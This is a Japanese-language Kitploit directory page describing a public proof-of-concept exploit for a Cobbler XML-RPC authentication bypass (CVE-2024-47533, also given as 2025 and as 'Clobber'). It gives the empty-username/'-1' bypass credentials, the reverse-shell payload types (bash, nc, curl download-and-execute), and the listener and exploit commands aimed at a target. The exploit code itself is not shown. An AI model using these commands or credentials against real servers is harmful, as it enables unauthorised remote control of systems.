Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-47533 — CVE-2025-47533 Clobber RCE のPoC | Kitploit
ツール/GitHubGitHub/zs1n/cve-2024-47533
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubzs1n/cve-2024-47533

CVE-2024-47533

CVE-2025-47533 Clobber RCE のPoC

リポジトリを見る
111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-47533 - Cobbler XMLRPC 認証バイパス RCE エクスプロイト

Cobbler における認証バイパスによる重大なリモートコード実行

PoC 実装。


概要

Cobbler(ネットワークインストール環境の迅速なセットアップを可能にする Linux インストールサーバー)には、バージョン 3.0.0 から 3.2.3 および 3.3.7 より前のバージョン(3.2.3 および 3.3.7 を含まない)に認証の脆弱性があります。関数 utils.get_shared_secret() は常に -1 を返すため、誰でも空のユーザー名 ('') とパスワード -1 で Cobbler XML-RPC インターフェースに接続できます。これにより、ネットワークアクセスを持つ攻撃者は Cobbler サーバーの完全な制御を取得できます。この脆弱性はバージョン 3.2.3 および 3.3.7 で修正されています。


🛠 技術的詳細

この脆弱性は、utils.get_shared_secret() 関数における共有シークレットの不適切な処理に起因し、この関数が常に -1 を返すため、認証が実質的にバイパスされます。これにより、任意のネットワークユーザーが空の認証情報で Cobbler の XMLRPC インターフェースに接続し、任意のコマンドを実行できるようになります。


🔥 脆弱なエンドポイント

http://<target>:25151/ — Cobbler の XMLRPC API エンドポイント


💥 ペイロード例

エクスプロイトスクリプトは、以下のようなさまざまなリバースシェルペイロードをサポートしています。

  • Bash リバースシェル
  • Netcat シェル (nc)
  • Curl ダウンロード&実行

概念実証(PoC)

リスナーの準備

マシン上で Netcat リスナーを起動します:

root@kitploit:~
nc -lvnp 4444

🚀 エクスプロイトの実行

エクスプロイトスクリプト CVE-2024-47533.py を実行します。

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

パラメータ

-t : ターゲット (例: -t http://1<IP_SERVICE>:<PORT>)

-l: ローカル IP (例: -l 10.10.11.80)

-p : ポート <LOCAL_PORT> (例: -p 4444)

--payload: ペイロード(bash, curl, nc) (例: --payload bash)

💻 リモートシェルアクセスの成功

実行が成功すると、リバースシェルがリスナーに接続し、攻撃者にサーバーへのリモートアクセスを許可します。

ツールをダウンロード